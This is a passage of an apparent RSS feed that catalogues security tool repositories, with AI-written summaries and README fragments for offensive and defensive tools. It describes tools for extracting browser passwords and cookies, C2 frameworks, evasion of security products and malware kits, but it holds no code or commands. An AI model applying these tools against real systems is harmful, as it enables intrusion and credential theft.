&lt;h1 id="habomalhunter-habo-linux-malware-analysis-system"&gt;HaboMalHunter: Habo Linux Malware Analysis System&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.blackhat.com/asia-17/arsenal.html#habomalhunter-an-automated-malware-analysis-tool-for-linux-elf-files"&gt;&lt;img src="https://cdn.rawgit.com/toolswatch/badges/master/arsenal/2017.svg" alt="BlackHat"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat" alt="license"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/pulls"&gt;&lt;img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg" alt="PRs Welcome"&gt;&lt;/a&gt;
&lt;a href="https://github.com/Tencent/HaboMalHunter/wiki"&gt;&lt;img src="https://img.shields.io/badge/Platform-Linux-brightgreen.svg" alt="Platform"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>hack-tools</title><link>https://rainmana.github.io/hackyfeed/tools/hacktoolspack-hack-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hacktoolspack-hack-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;hack-tools&amp;rdquo; repository offers a comprehensive collection of cybersecurity tools including DOS, information gathering utilities, malware creation kits, and remote administration tools, catering to a wide audience from enthusiasts to professionals. Key features include multi-platform support for Windows and Linux, compatibility with several programming languages, and the availability of free tools; however, users are cautioned about the legal implications and varying development statuses of the tools provided.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://i.giphy.com/media/2Y0ecuTsnAvZK/200.gif" alt="animated" /&gt;
&lt;/p&gt;</description></item><item><title>hackbar2.1.3</title><link>https://rainmana.github.io/hackyfeed/tools/mr-xn-hackbar2.1.3/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mr-xn-hackbar2.1.3/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hackbar 2.1.3 is a Firefox extension designed for penetration testing that facilitates web application security assessments by allowing users to manipulate HTTP requests. The tool enables users to load specific payloads and automate tasks, making it suitable for security professionals. Notable features include compatibility with various versions of browsers, and updates that offer newer functionalities and security patches.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h1 id="hackbar213"&gt;hackbar2.1.3&lt;/h1&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;firefox hackbar收费前的残留版本&lt;/br&gt;
使用方法&lt;/br&gt;
打开firefox的插件目录&lt;/br&gt;
&lt;img src="./img/1.png" alt="Image text"&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;然后点这里&lt;/br&gt;
&lt;img src="./img/2.png" alt="Image text"&gt;&lt;/br&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3 id="加载4c98c9c7-fc13-4622-b08a-a18923469c1cxpi--即可"&gt;加载{4c98c9c7-fc13-4622-b08a-a18923469c1c}.xpi 即可&lt;/h3&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3 id="一定记住要关闭插件的自动更新否则浏览器会自动更新插件到收费版本"&gt;一定记住要关闭插件的自动更新！！！，否则浏览器会自动更新插件到收费版本！！!&lt;/h3&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;设置方法如下图所示:&lt;/br&gt;
&lt;img src="./img/3.png" alt="unable updae"&gt;&lt;/p&gt;</description></item><item><title>HackBrowserData</title><link>https://rainmana.github.io/hackyfeed/tools/moond4rk-hackbrowserdata/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/moond4rk-hackbrowserdata/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackBrowserData is a command-line utility designed for decrypting and exporting sensitive data, such as passwords, cookies, and browsing history, from various popular web browsers on Windows, macOS, and Linux. Its notable features include support for the latest encryption standards, like AES-256-CBC for Firefox 144 and beyond, and comprehensive compatibility with a wide range of browsers including Google Chrome, Microsoft Edge, and Opera. The tool emphasizes its intended use for security research while disclaiming legal responsibilities associated with its application.&lt;/p&gt;</description></item><item><title>hackdroid</title><link>https://rainmana.github.io/hackyfeed/tools/thehackingsage-hackdroid/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thehackingsage-hackdroid/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackDroid is a comprehensive collection of penetration testing and security-related applications tailored for Android devices. It organizes applications into diverse categories, including forensics, networking, and cryptography, to facilitate easy access and download, while emphasizing the necessity of root permissions and ethical use cases. Notable features include a wide range of tools for various hacking and security tasks, and guidance for use on secondary devices to mitigate risks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
	&lt;a href="https://thehackingsage.com/hackdroid/"&gt;&lt;img src="https://thehackingsage.com/hackdroid/assets/img/hackdroid/logo.png" alt="HACKDROID"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hacker-Roadmap</title><link>https://rainmana.github.io/hackyfeed/tools/hacking-notes-hacker-roadmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hacking-notes-hacker-roadmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Hacker Roadmap is a comprehensive guide designed to assist individuals at various stages of their cybersecurity journey, from hobbyists to those pursuing certifications or degrees. It outlines multiple pathways tailored to specific goals, such as becoming a bug bounty hunter or quickly entering the cybersecurity workforce. Notable features include structured roadmaps, visual resources, and links to additional hacking aids for both red and blue team strategies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacker-roadmap"&gt;Hacker Roadmap&lt;/h1&gt;
&lt;p&gt;Are you ready to embark on an electrifying journey into the depths of cybersecurity? Whether you&amp;rsquo;re eyeing a prestigious certification, gearing up for a Bachelor&amp;rsquo;s degree, or simply indulging your insatiable curiosity, this roadmap is your ultimate guide to becoming a true hacking virtuoso. But before we dive into the nitty-gritty, let&amp;rsquo;s set the stage. Are you in it for the thrill, the challenge, or perhaps envisioning a career at the cutting edge of cyber defense? Your motivations will shape the path ahead, so let&amp;rsquo;s chart a course tailored precisely to your aspirations.&lt;/p&gt;</description></item><item><title>hackerpro</title><link>https://rainmana.github.io/hackyfeed/tools/jaykali-hackerpro/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jaykali-hackerpro/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackerPro is a comprehensive pentesting toolkit designed for security professionals, offering a wide array of tools for information gathering, password attacks, wireless testing, web hacking, and post-exploitation. Notable features include Nmap for network scanning, sqlmap for SQL injection, and a suite of tools for scanning and exploiting web applications. This tool facilitates multi-faceted penetration testing, making it essential for those engaged in cybersecurity assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/technicaldada/jaykali/issues"&gt;&lt;img src="https://img.shields.io/github/issues/jaykali/hackerpro.svg" alt="GitHub issues"&gt;&lt;/a&gt;
&lt;a href="https://github.com/jaykali/hackerpro/network"&gt;&lt;img src="https://img.shields.io/github/forks/jaykali/hackerpro.svg" alt="GitHub forks"&gt;&lt;/a&gt;
&lt;a href="https://github.com/jaykali/hackerpro/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/jaykali/hackerpro.svg" alt="GitHub stars"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HackGpt</title><link>https://rainmana.github.io/hackyfeed/tools/yashab-cyber-hackgpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yashab-cyber-hackgpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackGPT Enterprise is an AI-powered penetration testing platform tailored for enterprise security teams, designed to deliver comprehensive cybersecurity assessments through its advanced AI and machine learning capabilities. Key features include multi-model support for AI engines, automated reporting, robust compliance frameworks, and a cloud-native microservices architecture that enhances performance and scalability. Its tools for zero-day detection, risk intelligence, and extensive reporting ensure that organizations maintain a proactive stance against security threats.&lt;/p&gt;</description></item><item><title>hacking-online-games</title><link>https://rainmana.github.io/hackyfeed/tools/dsasmblr-hacking-online-games/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dsasmblr-hacking-online-games/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;hacking-online-games&amp;rdquo; repository serves as a comprehensive compilation of tutorials and resources focused on hacking online games, including techniques for reverse engineering game clients and decrypting network protocols. It emphasizes the community-driven aspect of sharing knowledge and resources, inviting contributions and updates from users. Notably, it includes links to articles, presentations, and discussions that provide insights into various methods and legal considerations related to game hacking.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;
 &lt;img src="https://raw.githubusercontent.com/dsasmblr/hacking-online-games/master/resources/guidedhacking-hero.png" /&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;span align="center"&gt;&lt;a href="https://guidedhacking.com/?utm_source=dsasmblr"&gt;This repo is sponsored by GuidedHacking.com!&lt;/a&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;h1 id="the-ultimate-online-game-hacking-resource"&gt;&lt;a href="https://github.com/dsasmblr/hacking-online-games/"&gt;The Ultimate Online Game Hacking Resource&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;A curated list of tutorials/resources for hacking online games!&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>hacking-resources</title><link>https://rainmana.github.io/hackyfeed/tools/lifka-hacking-resources/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lifka-hacking-resources/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Lifka/hacking-resources repository is a curated collection of hacking utilities and cheat sheets, aimed at assisting cybersecurity professionals and enthusiasts in their studies. It includes a variety of resources such as tools, OS distributions, tutorials, and specific cheat sheets for cloud, web, network, and system hacking. Notable features involve a comprehensive index and contributions from the community, facilitating an ongoing accumulation of valuable cybersecurity knowledge.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacking-resources-and-cheat-sheets"&gt;Hacking resources and cheat sheets&lt;/h1&gt;
&lt;!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --&gt;
&lt;p&gt;&lt;a href="#contributors-"&gt;&lt;img src="https://img.shields.io/badge/all_contributors-0-orange.svg?style=flat-square" alt="All Contributors"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Hacking-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/yogsec-hacking-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yogsec-hacking-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hacking-Tools is a curated collection of penetration testing and ethical hacking utilities, including essential tools from Kali Linux. It is organized into categories such as information gathering, vulnerability analysis, and exploitation tools, facilitating easy navigation and use. Notable features include a featured tool, BugBoard, designed to automate vulnerability detection for bug bounty hunters and security researchers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hacking-tools"&gt;Hacking-Tools&lt;/h1&gt;
&lt;div align="center" style="margin: 30px 0;"&gt;
A curated list of penetration testing and ethical hacking tools, organized by category. This collection includes Kali Linux tools and other notable utilities.
&lt;/br&gt;
&lt;p&gt;&lt;img src="https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExdHJjMXpvb2hkdXJvN2Y3cmllNG81YXNsem90ejhwY2NqbXB5OXgzaiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/137EaR4vAOCn1S/giphy.gif" alt="Hacking Anime"&gt;&lt;/p&gt;</description></item><item><title>Hacking-Windows</title><link>https://rainmana.github.io/hackyfeed/tools/mytechnotalent-hacking-windows/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mytechnotalent-hacking-windows/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hacking Windows is a comprehensive resource that provides insights into reverse engineering and hacking techniques specifically for Windows applications using Assembly language. It includes practical examples, tutorials, and chapters dedicated to debugging and analyzing various Windows API functions in both x86 and x64 architectures. Notable features include accessible self-study material, a free downloadable book, and hands-on exercises focused on real-world programming scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://github.com/mytechnotalent/Hacking-Windows/blob/main/Hacking%20Windows.png?raw=true" alt="image"&gt;&lt;/p&gt;
&lt;h2 id="free-reverse-engineering-self-study-course-here"&gt;FREE Reverse Engineering Self-Study Course &lt;a href="https://github.com/mytechnotalent/Reverse-Engineering-Tutorial"&gt;HERE&lt;/a&gt;&lt;/h2&gt;
&lt;br&gt;
&lt;h1 id="hacking-windows"&gt;Hacking Windows&lt;/h1&gt;
&lt;p&gt;The book and code repo for the FREE Hacking Windows book by Kevin Thomas.&lt;/p&gt;</description></item><item><title>hackingBuddyGPT</title><link>https://rainmana.github.io/hackyfeed/tools/ipa-lab-hackingbuddygpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ipa-lab-hackingbuddygpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackingBuddyGPT is a tool designed to assist security researchers in leveraging large language models (LLMs) for discovering new attack vectors, enabling efficient penetration testing and security assessments in 50 lines of code or less. Notable features include support for SSH connections to remote targets and local shell execution, enhancing testing capabilities while maintaining awareness of potential risks to live environments. The framework also provides reusable benchmarks for Linux privilege escalation and comparative analyses of multiple LLMs to facilitate optimal usage in security tasks.&lt;/p&gt;</description></item><item><title>HackTools</title><link>https://rainmana.github.io/hackyfeed/tools/lascc-hacktools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lascc-hacktools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackTools is an all-in-one browser extension designed for offensive security professionals to facilitate web application penetration testing. It consolidates numerous penetration testing tools, including dynamic reverse shell generators, XSS payloads, and SQL injection payloads, allowing users to access critical functions quickly through a user-friendly command palette. The extension aims to enhance efficiency by eliminating the need to search for payloads across various platforms, all accessible within the browser&amp;rsquo;s DevTools environment.&lt;/p&gt;</description></item><item><title>HackVault</title><link>https://rainmana.github.io/hackyfeed/tools/0xsobky-hackvault/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsobky-hackvault/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HackVault is a container repository designed for both defensive and offensive hacking tools. Its primary use case is to centralize and share various hacking utilities, which are intended to be continuously updated with new content over time. Notable features include a structured Wiki section for detailed information and ongoing additions to its arsenal of tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hackvault"&gt;HackVault&lt;/h1&gt;
&lt;p&gt;This is a container repository for my defensive/offensive hacks. Go check the &lt;a href="https://github.com/0xsobky/HackVault/wiki"&gt;Wiki section&lt;/a&gt; for more information!
Ideally, it&amp;rsquo;d be continually updated with new interesting stuff over time!&lt;/p&gt;</description></item><item><title>hal</title><link>https://rainmana.github.io/hackyfeed/tools/emsec-hal/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/emsec-hal/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HAL is a sophisticated framework designed for netlist reverse engineering and manipulation, allowing users to parse and analyze netlists from various hardware sources, such as FPGAs and ASICs, into a graph-based representation. Key features include high performance through an optimized C++ core, flexibility via Python bindings, a modular plugin system for extended functionality, and a rich GUI for visual inspection and interactive analysis. The tool aims to serve as a common baseline for researchers and analysts in the field of hardware reverse engineering, facilitating reproducibility and efficiency in research efforts.&lt;/p&gt;</description></item><item><title>hardening</title><link>https://rainmana.github.io/hackyfeed/tools/konstruktoid-hardening/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/konstruktoid-hardening/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hardening Ubuntu. Systemd edition.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hardening Ubuntu. Systemd edition.&lt;/p&gt;</description></item><item><title>harpoon</title><link>https://rainmana.github.io/hackyfeed/tools/te-k-harpoon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/te-k-harpoon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Harpoon is a command-line interface (CLI) tool designed for open-source intelligence (OSINT) and threat intelligence gathering. Its primary use case involves extracting comprehensive data from multiple security-related APIs, such as those for IP addresses, ASN queries, and domain information, through a range of built-in plugins. Notable features include support for multiple data sources, configurable API keys, and the ability to update the tool seamlessly for ongoing intelligence needs.&lt;/p&gt;</description></item><item><title>heap-viewer</title><link>https://rainmana.github.io/hackyfeed/tools/danigargu-heap-viewer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danigargu-heap-viewer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HeapViewer is an IDA Pro plugin designed for analyzing heap memory, particularly for exploit development focusing on the glibc malloc implementation (ptmalloc2). Notable features include heap tracing for memory allocation functions, detection of overlaps and double-frees, visualization tools, chunk and arena information, and various utilities for manipulating and understanding heap structures. This tool aids in the identification of vulnerabilities related to memory management in software applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="heapviewer"&gt;HeapViewer&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://www.gnu.org/licenses/gpl-3.0"&gt;&lt;img src="https://img.shields.io/badge/License-GPLv3-blue.svg" alt="License: GPL v3"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>hermes-dec</title><link>https://rainmana.github.io/hackyfeed/tools/p1sec-hermes-dec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p1sec-hermes-dec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; &lt;code&gt;hermes-dec&lt;/code&gt; is a reverse-engineering tool designed for disassembling and decompiling React Native applications that utilize the Hermes VM bytecode (HBC) format. Its primary use case is to transform Hermes bytecode files into human-readable formats, enabling analysis and understanding of the JavaScript code within mobile apps. Notable features include the ability to parse Hermes file headers, disassemble bytecode into intermediate representations, and decompile bytecode into pseudo-code, facilitating the examination of React Native applications.&lt;/p&gt;</description></item><item><title>Heroinn</title><link>https://rainmana.github.io/hackyfeed/tools/b23r0-heroinn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/b23r0-heroinn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Heroinn is a cross-platform command-and-control (C2) and post-exploitation framework developed in Rust, designed primarily for research and educational purposes. Notable features include a graphical user interface (GUI), an interactive PTY shell, system information collection, file management with support for large files and resuming broken transfers, and compatibility with multiple operating systems including Windows, Linux, BSD, and macOS, leveraging various communication protocols such as TCP, HTTP, and reliable UDP.&lt;/p&gt;</description></item><item><title>herpaderping</title><link>https://rainmana.github.io/hackyfeed/tools/jxy-s-herpaderping/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jxy-s-herpaderping/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Herpaderping is a process obfuscation tool that manipulates the content of a file on disk after it has been mapped for execution, thereby misleading security products and the operating system about the actual process being run. Its primary use case is to facilitate stealthy execution of binaries by exploiting the timing of process creation callbacks and on-write scanning mechanisms, allowing an actor to modify the file after mapping but before the process starts. Notable features include the ability to remain undetected during file inspections and the execution of a binary while obscuring its original content through a specific workflow of creating, mapping, modifying, and executing targets.&lt;/p&gt;</description></item><item><title>hexstrike-ai</title><link>https://rainmana.github.io/hackyfeed/tools/0x4m4-hexstrike-ai/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0x4m4-hexstrike-ai/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HexStrike AI is an advanced penetration testing platform that integrates over 150 security tools and more than 12 autonomous AI agents for automated cybersecurity assessment. Its primary use case focuses on cybersecurity automation, employing intelligent decision-making and vulnerability intelligence to optimize attack strategies and resource management. Notable features include real-time dashboards, progress visualization, and a multi-agent architecture that facilitates comprehensive penetration testing and threat analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;img src="assets/hexstrike-logo.png" alt="HexStrike AI Logo" width="220" style="margin-bottom: 20px;"/&gt;
&lt;h1 id="hexstrike-ai-mcp-agents-v60"&gt;HexStrike AI MCP Agents v6.0&lt;/h1&gt;
&lt;h3 id="ai-powered-mcp-cybersecurity-automation-platform"&gt;AI-Powered MCP Cybersecurity Automation Platform&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.python.org/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.8%2B-blue.svg" alt="Python"&gt;&lt;/a&gt;
&lt;a href="LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-green.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/Security-Penetration%20Testing-red.svg" alt="Security"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/MCP-Compatible-purple.svg" alt="MCP"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai/releases"&gt;&lt;img src="https://img.shields.io/badge/Version-6.0.0-orange.svg" alt="Version"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/Security%20Tools-150%2B-brightgreen.svg" alt="Tools"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/badge/AI%20Agents-12%2B-purple.svg" alt="Agents"&gt;&lt;/a&gt;
&lt;a href="https://github.com/0x4m4/hexstrike-ai"&gt;&lt;img src="https://img.shields.io/github/stars/0x4m4/hexstrike-ai?style=social" alt="Stars"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HexWalk</title><link>https://rainmana.github.io/hackyfeed/tools/gcarmix-hexwalk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gcarmix-hexwalk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HexWalk is a cross-platform hex editor, viewer, and analyzer that facilitates in-depth binary file examination. Its primary use case is for advanced binary analysis, featuring capabilities such as advanced pattern searching, entropy analysis, disassembly for multiple architectures, and integration with Binwalk for firmware analysis. Notable features include a hash calculator, byte pattern recognition for header parsing, and a comprehensive diff analysis tool, making it suitable for security researchers and developers working with binary data.&lt;/p&gt;</description></item><item><title>hidden</title><link>https://rainmana.github.io/hackyfeed/tools/jkornev-hidden/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jkornev-hidden/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hidden is a Windows driver designed for reverse engineering and research purposes, enabling users to conceal specific environmental indicators on their machines, such as debugging tools and virtual machine infrastructure. It offers advanced features to hide registry keys, files, directories, and processes, while providing a usermode interface through a library and command-line interface for comprehensive management capabilities. Notably, it includes the functionality to protect specific processes and exclude others from hiding features, all compatible with Windows Vista and later versions.&lt;/p&gt;</description></item><item><title>hollows_hunter</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-hollows_hunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-hollows_hunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hollows Hunter is a command-line tool designed to identify and dump potentially malicious implants in processes by utilizing the PE-sieve passive memory scanner. Its primary use case includes scanning processes based on various criteria, such as process name and creation time, and it offers capabilities for continuous memory scanning and ETW listening. Notable features include the ability to scan all processes if no specific targets are specified, and support for multiple input criteria for enhanced targeting.&lt;/p&gt;</description></item><item><title>HolyTips</title><link>https://rainmana.github.io/hackyfeed/tools/holybugx-holytips/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/holybugx-holytips/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HolyTips is a comprehensive repository that provides a collection of notes, checklists, and writeups focused on bug bounty hunting and web application security. Its primary use case is to serve as a resource for security researchers and ethical hackers, offering organized information that aids in identifying vulnerabilities. Notable features include structured content that facilitates quick reference and learning in the field of web security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="https://user-images.githubusercontent.com/71842138/130051116-59ce3e4c-97b6-4c6a-afdd-c82142e3d422.png" alt="Holy"&gt;&lt;/p&gt;
&lt;div align = "center"&gt; &lt;h1&gt; HolyTips &lt;/h1&gt; 
A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security.
&lt;p align="center"&gt;
 &lt;br&gt;
 &lt;a href="http://twitter.com/holybugx"&gt;
 &lt;img src="https://img.shields.io/twitter/follow/holybugx?label=Twitter&amp;logo=twitter&amp;style=for-the-badge" /&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/holybugx?tab=followers"&gt;
 &lt;img src="https://img.shields.io/github/followers/holybugx?label=GitHub&amp;logo=GitHub&amp;style=for-the-badge" alt="GitHub badge" /&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>honeypots</title><link>https://rainmana.github.io/hackyfeed/tools/qeeqbox-honeypots/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qeeqbox-honeypots/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Qeeqbox/honeypots is a versatile package containing 30 customizable honeypots designed for monitoring network traffic, bot activities, and credential harvesting. It features non-blocking responses, easy setup and customization, and supports logging to various outputs, including Postgres databases, terminal, and Syslog. The tool encapsulates multiple protocols like HTTP, FTP, SSH, and more, facilitating quick deployment of multiple honeypots for enhanced threat detection.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt; &lt;img src="https://raw.githubusercontent.com/qeeqbox/honeypots/main/readme/honeypots.png"&gt;&lt;/p&gt;
